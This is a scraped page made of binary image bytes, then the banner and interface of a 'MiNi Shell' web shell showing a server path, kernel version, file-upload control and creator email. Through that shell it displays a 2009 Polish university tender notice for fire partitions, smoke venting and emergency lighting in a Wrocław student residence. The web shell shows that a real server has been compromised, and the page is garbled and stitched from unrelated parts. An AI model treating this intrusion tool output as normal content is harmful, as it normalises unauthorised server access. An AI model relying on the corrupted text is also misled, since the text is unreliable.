JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090521/160774-N-2009.html

<p class="kh_header"><b>Wrocław: Modernizacja części budynku Hotelu Asystenta przy ul. Pautscha 5/7 we Wrocławiu na potrzeby domu studenckiego polegajaca na wykonaniu przegrody ogniowej w osi 10 oraz wykonanie systemów oddymiania i oświetlenia awaryjnego.</b><br>
<b>Numer ogłoszenia: 160774 - 2009; data zamieszczenia: 21.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy we Wrocławiu , ul. C.K. Norwida 25/27, 50-375 Wrocław, woj. dolnośląskie, tel. 071 3283576, 3205496, faks 071 3283576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.up.wroc.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> zamawiający nie ustanawia dynamicznego zakupu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja części budynku Hotelu Asystenta przy ul. Pautscha 5/7 we Wrocławiu na potrzeby domu studenckiego polegajaca na wykonaniu przegrody ogniowej w osi 10 oraz wykonanie systemów oddymiania i oświetlenia awaryjnego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OGÓLNA CHARAKTERYSTYKA ROBÓT

I. Wykonanie przegrody w osi 10 budynku o odporności ogniowej EI60 w tym:
- montaż przegrody przeciwpożarowej o odporności ogniowej EI 60 w osi 10,
- izolacja przeciwpożarowa rur stalowych na kondygnacji 1,
- wysunięcie ściany oddzielenia pożarowego o odporności ogniowej EI 60, na odległość 30cm  poza lico ściany zewnętrznej budynku,
- malowanie części ścian na kolor według RAL.
II. Wykonanie przegród budowlanych EI 30/EI 60 klatek schodowych K1 i K2 w tym:
- demontaż części istniejącej stolarki budowlanej ,
- montaż drzwi przeciwpożarowych o odporności EI 30/EI 60,
- wymurowanie i otynkowanie ścianki przeciwpożarowej EI 60 z otworem drzwiowym na  kondygnacji 1 w obrębie klatki schodowej K1,
- wykonanie otworu wentylacyjnego, wraz zamontowaniem kratki wentylacyjnej na kondygnacji 11 w obrębie klatki schodowej K1,
- montaż dwóch grzejników elektrycznych na kondygnacjach 2 i 3 w obrębie klatki
  schodowej K1 oraz K2 wraz z wykonaniem instalacji elektrycznej zasilającej grzejniki,
- montaż barierki w klatce schodowej K1 uniemożliwiającej zejście z kondygnacji 2, na kondygnację 1,
- poszerzenie otworu drzwiowego w klatce schodowej K2,
- malowanie części ścian na kolor według RAL.
III. Wykonanie oddymiania klatek schodowych K1 i K2 w tym:
a) Klatka schodowa K1
- demontaż stalowych, płaszczowych drzwi prowadzących na dach (1szt.),
- montaż nowych drzwi stalowych prowadzących na dach (1 szt.),
- montaż centrali oddymiania,
- montaż czujki pożarowej,
- montaż siłownika do drzwi stalowych oddymiających,
- montaż przycisków oddymiania (6 szt.),
- montaż przycisku wyjścia,
- montaż okablowania zasilającego centralę i siłownik,
- montaż okablowania sygnałowego,
- izolacja przeciwpożarowa przejść okablowania przez strefy pożarowe.
b) Klatka schodowa K2
- demontaż części luksferów,
- montaż okna trójdzielnego,
- montaż centrali oddymiania,
- montaż czujki pożarowej,
- montaż siłowników na oknach oddymiających (2 szt.),
- montaż przycisków oddymiania (5 szt.),
- montaż okablowania zasilającego centralę i siłownik,
- montaż okablowania sygnałowego,
- izolacja przeciwpożarowa przejść okablowania przez strefy pożarowe.
IV. Wykonanie oświetlenia awaryjnego i ewakuacyjnego wraz z montażem urządzeń systemowych, w tym:
- demontaż istniejących lamp na korytarzach, lamp i wyłączników na klatkach scho-dowych,
- wykonanie pionu elektrycznego biegnącego z rozdzielni głównej (RG) pionowo po klatce schodowej K1,
- montaż piętrowych rozdzielni oświetleniowych (RO),
- wymiana przewodów zasilających istniejącego oświetlenia,
- montaż opraw oświetleniowych na korytarzach i klatkach schodowych K1 i K2,
- montaż wyłączników oświetlenia,
- montaż inwerterów instalacji oświetlenia awaryjnego i ewakuacyjnego,
- montaż lampy ewakuacyjnej ciemnej nad wyjściem ze strefy pożarowej,
- izolacja przeciwpożarowa przejść okablowania przez strefy pożarowe
V. Przeniesienie portierni w obrębie holu budynku w tym:
- demontaż ścianki działowej o konstrukcji drewniano-szklanej,
- wyburzenie ścianki działowej ceglanej,
- demontaż drzwi stalowych,
- demontaż tablicy elektrycznej z urządzeniami sterującymi oświetleniem korytarzy wraz    z okablowaniem,
- demontaż instalacji elektrycznej przebiegającej w usuwanych ściankach działowych,
- demontaż nie używanego panelu wywołania instalacji komunikacji wewnętrznej,
- przeniesienie panelu wywoławczego systemu domofonowego do komunikacji we-wnątrz  obiektu,
- przeniesienie instalacji telefonicznej (dwie linie telefoniczne),
- demontaż instalacji sterowania elektrozaczepem drzwi wejściowych do budynku,
- przeniesienie wyposażenia portierni - meble, szafki na klucze itp.,
- demontaż dwóch warstw wykładziny,
- uzupełnienie ubytków w podłodze, suficie i ścianach powstałych w wyniku demontażu  ścianek działowych, oraz ich dostosowanie do istniejącego otoczenia,
- montaż aluminiowo- szklanej ścianki wydzielenia pożarowego wraz z drzwiami i okienkiem podawczym,
- montaż rozdzielni elektrycznej w portierni wraz z wykonaniem przyłącza z rozdzielni  głównej RG,
- montaż instalacji elektrycznej (instalacja oświetleniowa i gniazda wtyczkowe: tech-niczne,  do zasilania elementów teletechnicznych, oraz dedykowane dla systemu CC-TV),
- montaż instalacji domofonowej przy wejściu do obiektu wraz z elektrozaczepem,
- malowanie ścian portierni na kolor według RAL,
- ułożenie wykładziny typu TARKET.
VI Drobne prace montażowe oraz murarsko tynkarskie i malarskie
- montaż samozamykaczy w drzwiach z pomieszczeń prowadzących na drogi ewaku-acyjne  nie mających odporności ogniowej EI30 na kondygnacji 2-10,
- montaż drzwi przeciwpożarowych o odporności ogniowej EI 30/EI 60 przy przejściu z  części hotelowej do przychodni lekarskiej,
- rozbiórka i ponowne uzupełnienie części sufitu podwieszanego w obrębie drzwi do
  przychodni,
- obróbki tynkarskie oraz malowanie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.31.11.00-1, 45.31.12.00-2, 45.31.21.00-8, 45.42.10.00-4, 45.42.11.00-5, 45.42.11.41-4, 45.42.11.52-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> w niniejszym postępowaniu zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy którzy:
1)posiadają uprawnienia do wykonania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. prowadzą działalność gospodarczą na podstawie wpisu do właściwego rejestru albo wpisu do ewidencji działalności gospodarczej ,
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, tj.: 
a/ wykażą wykonanie w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 roboty budowlanej odpowiadającej swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia,  tj. wykonanie i uruchomienie oświetlenia ewakuacyjnego, o wartości  minimum 50.000 zł brutto każda, oraz co najmniej 1 roboty budowlanej  odpowiadającej swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia,  tj. wykonanie przegród i wydzieleń p.poż., o wartości  minimum 150.000 zł brutto każda oraz przedstawią dokumenty potwierdzające, że roboty te zostały wykonane należycie, 
b/ wykażą osobę, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w  specjalności konstrukcyjno-budowlanej oraz  aktualne zaświadczenie odpowiedniej Okręgowej Izby Samorządu Zawodowego potwierdzające członkostwo i posiadanie ubezpieczenia o.c., 
c/ wykażą osobę, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku kierownika robót elektrycznych, posiadającą uprawnienia budowlane  do kierowania robotami budowlanymi w specjalności instalacji oraz  aktualne zaświadczenie odpowiedniej Okręgowej Izby Samorządu Zawodowego potwierdzające członkostwo i posiadanie ubezpieczenia o.c.,
UWAGA!
Zamawiający określając wymogi dla każdego z kierowników w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im uprawnienia uzyskane na podstawie wczesniej obowiązujących przepisów.
Kierownik robót branżowych może równocześnie kierować robotami kilku branż pod warunkiem posiadania odpowiednich uprawnień.
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności ,
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy .
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana zgodnie     z formułą: spełnia - nie spełnia na podstawie dokumentów złożonych wraz z ofertą.
Niespełnienie chociaż jednego z wyżej wymienionych warunków skutkować będzie wykluczeniem  wykonawcy z postępowania  i uznaniem jego oferty za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
2.Oświadczenie wykonawcy w zakresie art.22 ust.1 pkt 1-3 ustawy - załącznik nr 2 do SIWZ.
3.Oświadczenie wykonawcy o nie podleganiu wykluczeniu z postępowania - załącznik nr 3 do SIWZ
4.Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia  z podaniem ich wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. referencje, protokoły odbioru) - załącznik nr 5 do SIWZ
5.Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyćw wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - załącznik nr 4 do SIWZ
6.Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w pkt 5 wykonawca wskazał osoby, którymi będzie dysponował ( dokument o którym mowa należy przedstawić w ofercie w sytuacji gdy wykonawca ją składający nie dysponuje osobami zdolnymi do wykonania zamówienia; dokument ten powinien być dołączony do oświadczenia stanowiącego załacznik nr2 do SIWZ)
7.Dokumenty stwierdzajace, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
8.Polisa, a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
W złożonej ofercie wspólnej przez kilka podmiotów każdy z nich zobowiązany jest przedstawić dokumenty wystawione na niego wymienione w punktach 1 i 3, Dokumenty określone w punktach 2, 4, 5, 6, 7, 8, poszczególne podmioty składają wspólnie, tj. warunki w nich określone zostaną spełnione, gdy podmioty składające wspólną ofertę spełnią je łącznie. W przypadku złożenia oferty przez spółkę cywilną dopuszcza się złożenie polisy OC w zakresie prowadzonej działalności gospodarczej wystawionej na spółkę.  W takim przypadku w  treści polisy musi być wskazana nazwa spółki oraz nazwiska wszystkich wspólników. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów o których mowa  w pkt. 1 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że: nie otwarto jego likwidacji ani nie ogłoszono upadłości.Dokumenty o których mowa powyżej powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów,takich jak w pkt1  wykonawca zastępuje  je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego, odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.  Dokument ten musi być wystawiony nie wcześniej niż 6 miesiecy przed upływem terminu składania ofert. Pozostałe dokumenty o których mowa wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa w formie i treści w nim określonej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.up.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych i Umów Uniwersytetu Przyrodniczego we Wrocławiu, ul. Mikulicza - Radeckiego 6, 50-345 Wrocław, pokój 114 w godzinach od 10,30 do 13,30, cena:60 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 10:30, miejsce: sekretariat Kanclerza Uniwersytetu Przyrodniczego we Wrocławiu, ul. Mikulicza - Radeckiego 6, 50-345 Wrocław, pokój 102.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nr referencyjny nadany przez zamawiającego: RAP/15/2009. zamawiający nie dopuszcza składania ofert wariantowych, oraz nie zamierza zawrzeć umowy ramowej, ponadto nie zamierza ustanowić dynamicznego systemu zakupów.

Creat By MiNi SheLL
Email: jattceo@gmail.com